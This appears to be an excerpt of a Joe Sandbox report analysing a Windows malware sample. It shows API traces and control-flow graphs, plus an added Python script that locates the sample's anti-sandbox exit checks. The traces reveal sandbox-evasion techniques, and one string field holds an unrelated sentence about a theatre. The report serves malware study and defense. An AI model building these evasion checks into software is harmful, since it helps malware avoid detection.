                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: 2115f1a2305295b17ddda140e39a34c68e7a997332bf722c4f9891a5920b09fb
                                  • Instruction ID: 3168acdd72e40f1191a04261b7d4c176694226b0de4f5a10084b9b07fe0803c4
                                  • Opcode Fuzzy Hash: 2115f1a2305295b17ddda140e39a34c68e7a997332bf722c4f9891a5920b09fb
                                  • Instruction Fuzzy Hash: 9A525B31D11616ABCB22EFA4DC49BAE7BF9AF04310F554424F809AF251DB34ED46DBA0

                                  Control-flow Graph (function 366390; basic blocks with their successors, executed/not-executed colouring of the original image not reproduced)
                                  • 2125 366390-3663bd: GetPEB → 2126, 2127
                                  • 2126 3665c3-366623: LoadLibraryA * 5 → 2129, 2130
                                  • 2127 3663c3-3665be: call 3662f0, GetProcAddress * 20 → 2126
                                  • 2129 366625-366633: GetProcAddress → 2130
                                  • 2130 366638-36663f → 2132, 2133
                                  • 2132 366641-366667: GetProcAddress * 2 → 2133
                                  • 2133 36666c-366673 → 2134, 2135
                                  • 2134 366675-366683: GetProcAddress → 2135
                                  • 2135 366688-36668f → 2136, 2137
                                  • 2136 3666a4-3666ab → 2139, 2140
                                  • 2137 366691-36669f: GetProcAddress → 2136
                                  • 2139 3666d7-3666da (exit)
                                  • 2140 3666ad-3666d2: GetProcAddress * 2 → 2139
                                  APIs
                                  • GetProcAddress.KERNEL32(76F70000,00FA05B8), ref: 003663E9
                                  • GetProcAddress.KERNEL32(76F70000,00FA0750), ref: 00366402
                                  • GetProcAddress.KERNEL32(76F70000,00FA0528), ref: 0036641A
                                  • GetProcAddress.KERNEL32(76F70000,00FA05D0), ref: 00366432
                                  • GetProcAddress.KERNEL32(76F70000,00FA8AB8), ref: 0036644B
                                  • GetProcAddress.KERNEL32(76F70000,00F96220), ref: 00366463
                                  • GetProcAddress.KERNEL32(76F70000,00F96380), ref: 0036647B
                                  • GetProcAddress.KERNEL32(76F70000,00FA0768), ref: 00366494
                                  • GetProcAddress.KERNEL32(76F70000,00FA0600), ref: 003664AC
                                  • GetProcAddress.KERNEL32(76F70000,00FA0540), ref: 003664C4
                                  • GetProcAddress.KERNEL32(76F70000,00FA0618), ref: 003664DD
                                  • GetProcAddress.KERNEL32(76F70000,00F96520), ref: 003664F5
                                  • GetProcAddress.KERNEL32(76F70000,00FA0648), ref: 0036650D
                                  • GetProcAddress.KERNEL32(76F70000,00FA07B0), ref: 00366526
                                  • GetProcAddress.KERNEL32(76F70000,00F964A0), ref: 0036653E
                                  • GetProcAddress.KERNEL32(76F70000,00FA07E0), ref: 00366556
                                  • GetProcAddress.KERNEL32(76F70000,00FA08A0), ref: 0036656F
                                  • GetProcAddress.KERNEL32(76F70000,00F96540), ref: 00366587
                                  • GetProcAddress.KERNEL32(76F70000,00FA0828), ref: 0036659F
                                  • GetProcAddress.KERNEL32(76F70000,00F961E0), ref: 003665B8
                                  • LoadLibraryA.KERNEL32(00FA0888,?,?,?,00361C03), ref: 003665C9
                                  • LoadLibraryA.KERNEL32(00FA08D0,?,?,?,00361C03), ref: 003665DB
                                  • LoadLibraryA.KERNEL32(00FA08B8,?,?,?,00361C03), ref: 003665ED
                                  • LoadLibraryA.KERNEL32(00FA0840,?,?,?,00361C03), ref: 003665FE
                                  • LoadLibraryA.KERNEL32(00FA0858,?,?,?,00361C03), ref: 00366610
                                  • GetProcAddress.KERNEL32(76DA0000,00FA0810), ref: 0036662D
                                  • GetProcAddress.KERNEL32(75840000,00FA0870), ref: 00366649
                                  • GetProcAddress.KERNEL32(75840000,00FA8CD0), ref: 00366661
                                  • GetProcAddress.KERNEL32(753A0000,00FA8DD8), ref: 0036667D
                                  • GetProcAddress.KERNEL32(77300000,00F964C0), ref: 00366699
                                  • GetProcAddress.KERNEL32(774D0000,00FA8A88), ref: 003666B5
                                  • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 003666CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 003666C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: bd72beb62521b8a10effcc597299b7366c7e583dce5e7699f969fff35fd28972
                                  • Instruction ID: a616803302d87ca82bdee03b74c0601620ee61ffddea9250573918a37188c107
                                  • Opcode Fuzzy Hash: bd72beb62521b8a10effcc597299b7366c7e583dce5e7699f969fff35fd28972
                                  • Instruction Fuzzy Hash: 49A141B5AA12009FD754DF64FD4CA2A37B9F7A87513108519E91EC3364DB34A888FB70

                                  Control-flow Graph (function 361bf0; basic blocks with their successors, executed/not-executed colouring of the original image not reproduced)
                                  • 2141 361bf0-361c0b: call 342a90, call 366390 → 2146, 2147
                                  • 2146 361c0d → 2148
                                  • 2147 361c1a-361c27: call 342930 → 2151, 2152
                                  • 2148 361c10-361c18 → 2147, 2148
                                  • 2151 361c35-361c63 → 2156, 2157
                                  • 2152 361c29-361c2f: lstrcpy → 2151
                                  • 2156 361c65-361c67: ExitProcess
                                  • 2157 361c6d-361c7b: GetSystemInfo → 2158, 2159
                                  • 2158 361c85-361ca0: call 341030, call 3410c0, GetUserDefaultLangID → 2164, 2165
                                  • 2159 361c7d-361c7f: ExitProcess
                                  • 2164 361ca2-361ca9 → 2165, 2166
                                  • 2165 361cb8-361cca: call 362ad0, call 363e10 → 2171, 2172
                                  • 2166 361cb0-361cb2: ExitProcess
                                  • 2171 361ce7-361d06: lstrlen, call 342930 → 2177, 2178
                                  • 2172 361ccc-361cde: call 362a40, call 363e10 → 2171, 2183
                                  • 2177 361d23-361d40: lstrlen, call 342930 → 2186, 2187
                                  • 2178 361d08-361d0d → 2177, 2181
                                  • 2181 361d0f-361d11 → 2177, 2184
                                  • 2183 361ce0-361ce1: ExitProcess
                                  • 2184 361d13-361d1d: lstrcpy, lstrcat → 2177
                                  • 2186 361d42-361d44 → 2187, 2188
                                  • 2187 361d5a-361d7b: call 362ad0, lstrlen, call 342930 → 2193, 2194
                                  • 2188 361d46-361d54: lstrcpy, lstrcat → 2187
                                  • 2193 361d7d-361d7f → 2194, 2195
                                  • 2194 361d9a-361db4: lstrlen, call 342930 → 2199, 2200
                                  • 2195 361d81-361d85 → 2194, 2197
                                  • 2197 361d87-361d94: lstrcpy, lstrcat → 2194
                                  • 2199 361db6-361db8 → 2200, 2201
                                  • 2200 361dce-361deb: call 362a40, lstrlen, call 342930 → 2206, 2207
                                  • 2201 361dba-361dc8: lstrcpy, lstrcat → 2200
                                  • 2206 361ded-361def → 2207, 2208
                                  • 2207 361e0a-361e0f → 2209, 2210
                                  • 2208 361df1-361df5 → 2207, 2211
                                  • 2209 361e16-361e22: call 342930 → 2215, 2216
                                  • 2210 361e11: call 342a20 → 2209
                                  • 2211 361df7-361e04: lstrcpy, lstrcat → 2207
                                  • 2215 361e24-361e26 → 2216, 2217
                                  • 2216 361e30-361e66: call 342a20 * 5, OpenEventA → 2228, 2229
                                  • 2217 361e28-361e2a: lstrcpy → 2216
                                  • 2228 361e8c-361ea0: CreateEventA, call 361b20, call 35ffd0 → 2233
                                  • 2229 361e68-361e8a: CloseHandle, Sleep, OpenEventA → 2228, 2229
                                  • 2233 361ea5-361eae: CloseHandle, ExitProcess
                                  APIs
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA05B8), ref: 003663E9
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0750), ref: 00366402
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0528), ref: 0036641A
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA05D0), ref: 00366432
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA8AB8), ref: 0036644B
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00F96220), ref: 00366463
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00F96380), ref: 0036647B
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0768), ref: 00366494
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0600), ref: 003664AC
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0540), ref: 003664C4
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0618), ref: 003664DD
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00F96520), ref: 003664F5
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0648), ref: 0036650D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00361C2F
                                  • ExitProcess.KERNEL32 ref: 00361C67
                                  • GetSystemInfo.KERNEL32(?), ref: 00361C71
                                  • ExitProcess.KERNEL32 ref: 00361C7F
                                    • Part of subcall function 00341030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00341046
                                    • Part of subcall function 00341030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0034104D
                                    • Part of subcall function 00341030: ExitProcess.KERNEL32 ref: 00341058
                                    • Part of subcall function 003410C0: GlobalMemoryStatusEx.KERNEL32 ref: 003410EA
                                    • Part of subcall function 003410C0: ExitProcess.KERNEL32 ref: 00341114
                                  • GetUserDefaultLangID.KERNEL32 ref: 00361C8F
                                  • ExitProcess.KERNEL32 ref: 00361CB2
                                  • ExitProcess.KERNEL32 ref: 00361CE1
                                  • lstrlen.KERNEL32(00FA8A78), ref: 00361CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00361D15
                                  • lstrcat.KERNEL32(00000000,00FA8A78), ref: 00361D1D
                                  • lstrlen.KERNEL32(00374B98), ref: 00361D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361D48
                                  • lstrcat.KERNEL32(00000000,00374B98), ref: 00361D54
                                  • lstrlen.KERNEL32(00000000), ref: 00361D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361D94
                                  • lstrlen.KERNEL32(00374B98), ref: 00361D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361DBC
                                  • lstrcat.KERNEL32(00000000,00374B98), ref: 00361DC8
                                  • lstrlen.KERNEL32(00000000), ref: 00361DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: b3482d304dce2658bdf6d4a145d227ea7ca2699fc80b26dde91dd2d208c95ee8
                                  • Instruction ID: e75bff62fbc63175062b98be93cd0072607b1d32455f30d9e175b81f10dbbc5f
                                  • Opcode Fuzzy Hash: b3482d304dce2658bdf6d4a145d227ea7ca2699fc80b26dde91dd2d208c95ee8
                                  • Instruction Fuzzy Hash: E171B531550216ABC722AFB0EC4DF7F7AB9AF55701F098024F90AAA1A5DF70D845EB70
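                                  The control-flow graph of the entry function at 361bf0 above is where the report's evasion signatures come from: GetSystemInfo, the subcalls at 341030 (VirtualAllocExNuma) and 3410c0 (GlobalMemoryStatusEx), and GetUserDefaultLangID each sit in a block whose other successor is an ExitProcess block. The Python script below is an added example, not part of the Joe Sandbox report or of the sample. It parses the report's flattened control_flow_graph text (a node id followed by a 6-digit hex address or address range, label tokens, and src->dst edges; this token grammar is inferred from the excerpt, not documented by Joe Sandbox) and, for every block that calls ExitProcess, reports the nearest predecessor block carrying an API or call label. That attribution is a heuristic: the unlabelled block 361c35-361c63, for instance, chooses between ExitProcess and GetSystemInfo on a value produced by the earlier call 342930, which the graph alone does not explain.

```python
import re
from collections import deque

# Token shapes in the flattened dump (inferred from the report excerpt):
#   edge  : "<src>-><dst>"                       e.g. 2151->2156
#   node  : "<id> <addr>" where addr is 6 hex digits or "<start>-<end>"
#   label : anything else, attached to the most recent node (API names,
#           "call <addr>", "* <count>" multipliers)
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{6}(?:-[0-9a-f]{6})?$")


def parse_cfg(text):
    """Return ({node_id: {"addr": str, "label": [str]}}, [(src, dst), ...])."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            i += 1
            continue
        # A decimal token directly followed by an address token opens a node.
        # Label tokens such as "* 5" or "call 366390" never satisfy both
        # conditions in this dump: what follows them is an edge or a node id.
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "label": []}
            i += 2
            continue
        if current is None:
            raise ValueError(f"label {tok!r} before any node")
        nodes[current]["label"].append(tok)
        i += 1
    for s, d in edges:
        if s not in nodes or d not in nodes:
            raise ValueError(f"edge {s}->{d} references an unknown node")
    return nodes, edges


def exit_gates(nodes, edges, sink="ExitProcess", max_depth=3):
    """For each block calling `sink`, walk predecessors (BFS over reversed
    edges, lowest node id first, at most max_depth hops) to the nearest
    block with any API/call label and report it as the gate.  Returns a
    sorted list of (sink_block_addr, gate_block_addr or None, gate_label)."""
    preds = {}
    for s, d in edges:
        preds.setdefault(d, set()).add(s)
    result = []
    for nid, node in nodes.items():
        if sink not in node["label"]:
            continue
        seen, gate = {nid}, None
        queue = deque((p, 1) for p in sorted(preds.get(nid, ()), key=int))
        while queue:
            pid, depth = queue.popleft()
            if pid in seen:
                continue
            seen.add(pid)
            if nodes[pid]["label"]:
                gate = pid
                break
            if depth < max_depth:
                queue.extend((pp, depth + 1)
                             for pp in sorted(preds.get(pid, ()), key=int))
        result.append((node["addr"],
                       nodes[gate]["addr"] if gate else None,
                       " ".join(nodes[gate]["label"]) if gate else ""))
    return sorted(result)


# Sample input: the first 13 nodes of the report's own flattened graph for
# the function at 0x361bf0, copied verbatim from the dump above.
SAMPLE_CFG = (
    "control_flow_graph 2141 361bf0-361c0b call 342a90 call 366390 "
    "2146 361c0d 2141->2146 2147 361c1a-361c27 call 342930 2141->2147 "
    "2148 361c10-361c18 2146->2148 2151 361c35-361c63 2147->2151 "
    "2152 361c29-361c2f lstrcpy 2147->2152 2148->2147 2148->2148 "
    "2156 361c65-361c67 ExitProcess 2151->2156 "
    "2157 361c6d-361c7b GetSystemInfo 2151->2157 2152->2151 "
    "2158 361c85-361ca0 call 341030 call 3410c0 GetUserDefaultLangID 2157->2158 "
    "2159 361c7d-361c7f ExitProcess 2157->2159 2164 361ca2-361ca9 2158->2164 "
    "2165 361cb8-361cca call 362ad0 call 363e10 2158->2165 2164->2165 "
    "2166 361cb0-361cb2 ExitProcess 2164->2166"
)


def sample_gates():
    nodes, edges = parse_cfg(SAMPLE_CFG)
    return exit_gates(nodes, edges)


if __name__ == "__main__":
    for exit_blk, gate_blk, label in sample_gates():
        print(f"ExitProcess at {exit_blk:<14} gated by {gate_blk or '?':<14} {label}")
```

On the excerpt this yields three gates: 361c65-361c67 after the block calling 342930, 361c7d-361c7f after GetSystemInfo, and 361cb0-361cb2 after the block that runs 341030, 3410c0 and GetUserDefaultLangID. The same parser accepts the full graph line or any other control_flow_graph dump on this page; the seen set and max_depth bound keep a self-loop such as 2148->2148 from dragging unrelated blocks into the attribution.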

                                  Control-flow Graph (function 344a60; basic blocks with their successors, executed/not-executed colouring of the original image not reproduced)
                                  • 2850 344a60-344afc: RtlAllocateHeap → 2867, 2868
                                  • 2867 344afe-344b03 → 2869
                                  • 2868 344b7a-344bbe: VirtualProtect (exit)
                                  • 2869 344b06-344b78 → 2868
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00344AA3
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00344BB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: 634aa0d8bac7c2be104dff2594033968460eda6fa5f40723dc786aac40294c02
                                  • Instruction ID: 6addf7966c6c4922ccc9b1a3e08ccc53b1c43b542b7bdb1cd6a009e3fd5332df
                                  • Opcode Fuzzy Hash: 634aa0d8bac7c2be104dff2594033968460eda6fa5f40723dc786aac40294c02
                                  • Instruction Fuzzy Hash: D331F81AF842BC769632EBEF4C47FDFAE55DF86750B028056F60C57180CBA97401CAA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00362A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00362A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00362A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 3b5cae1e76f05ecd8e6c2a3d433161097c35a007492b1d2bdb9e58001cb5a128
                                  • Instruction ID: f5ceed3c068ee9aa8ddf20af2acf2377545f1f8b4e9fbf4b58885149a72f0375
                                  • Opcode Fuzzy Hash: 3b5cae1e76f05ecd8e6c2a3d433161097c35a007492b1d2bdb9e58001cb5a128
                                  • Instruction Fuzzy Hash: 20F0B4B1A40604ABC700DF88ED49F9EBBBCF704B21F100216F919E3380D77419048AA1

                                  Control-flow Graph (function 3666e0; basic blocks with their successors, executed/not-executed colouring of the original image not reproduced)
                                  • 633 3666e0-3666e7 → 634, 635
                                  • 634 366afe-366b92: LoadLibraryA * 8 → 636, 637
                                  • 635 3666ed-366af9: GetProcAddress * 43 → 634
                                  • 636 366b94-366c03: GetProcAddress * 5 → 637
                                  • 637 366c08-366c0f → 638, 639
                                  • 638 366c15-366ccd: GetProcAddress * 8 → 639
                                  • 639 366cd2-366cd9 → 640, 641
                                  • 640 366d4f-366d56 → 642, 643
                                  • 641 366cdb-366d4a: GetProcAddress * 5 → 640
                                  • 642 366d5c-366de4: GetProcAddress * 6 → 643
                                  • 643 366de9-366df0 → 644, 645
                                  • 644 366df6-366f0b: GetProcAddress * 12 → 645
                                  • 645 366f10-366f17 → 646, 647
                                  • 646 366f8d-366f94 → 648, 649
                                  • 647 366f19-366f88: GetProcAddress * 5 → 646
                                  • 648 366f96-366fbc: GetProcAddress * 2 → 649
                                  • 649 366fc1-366fc8 → 650, 651
                                  • 650 366ff5-366ffc → 652, 653
                                  • 651 366fca-366ff0: GetProcAddress * 2 → 650
                                  • 652 367002-3670e8: GetProcAddress * 10 → 653
                                  • 653 3670ed-3670f4 → 654, 655
                                  • 654 3670f6-36714d: GetProcAddress * 4 → 655
                                  • 655 367152-367159 → 656, 657
                                  • 656 36716e-367175 → 658, 659
                                  • 657 36715b-367169: GetProcAddress → 656
                                  • 658 367177-3671ce: GetProcAddress * 4 → 659
                                  • 659 3671d3 (exit)
                                  APIs
                                  • GetProcAddress.KERNEL32(76F70000,00F96480), ref: 003666F5
                                  • GetProcAddress.KERNEL32(76F70000,00F965A0), ref: 0036670D
                                  • GetProcAddress.KERNEL32(76F70000,00FA8F70), ref: 00366726
                                  • GetProcAddress.KERNEL32(76F70000,00FA8EB0), ref: 0036673E
                                  • GetProcAddress.KERNEL32(76F70000,00FAC7A0), ref: 00366756
                                  • GetProcAddress.KERNEL32(76F70000,00FAC830), ref: 0036676F
                                  • GetProcAddress.KERNEL32(76F70000,00F9B3C8), ref: 00366787
                                  • GetProcAddress.KERNEL32(76F70000,00FAC848), ref: 0036679F
                                  • GetProcAddress.KERNEL32(76F70000,00FAC8C0), ref: 003667B8
                                  • GetProcAddress.KERNEL32(76F70000,00FAC740), ref: 003667D0
                                  • GetProcAddress.KERNEL32(76F70000,00FAC8F0), ref: 003667E8
                                  • GetProcAddress.KERNEL32(76F70000,00F96340), ref: 00366801
                                  • GetProcAddress.KERNEL32(76F70000,00F961C0), ref: 00366819
                                  • GetProcAddress.KERNEL32(76F70000,00F96420), ref: 00366831
                                  • GetProcAddress.KERNEL32(76F70000,00F96200), ref: 0036684A
                                  • GetProcAddress.KERNEL32(76F70000,00FAC818), ref: 00366862
                                  • GetProcAddress.KERNEL32(76F70000,00FAC8D8), ref: 0036687A
                                  • GetProcAddress.KERNEL32(76F70000,00F9B170), ref: 00366893
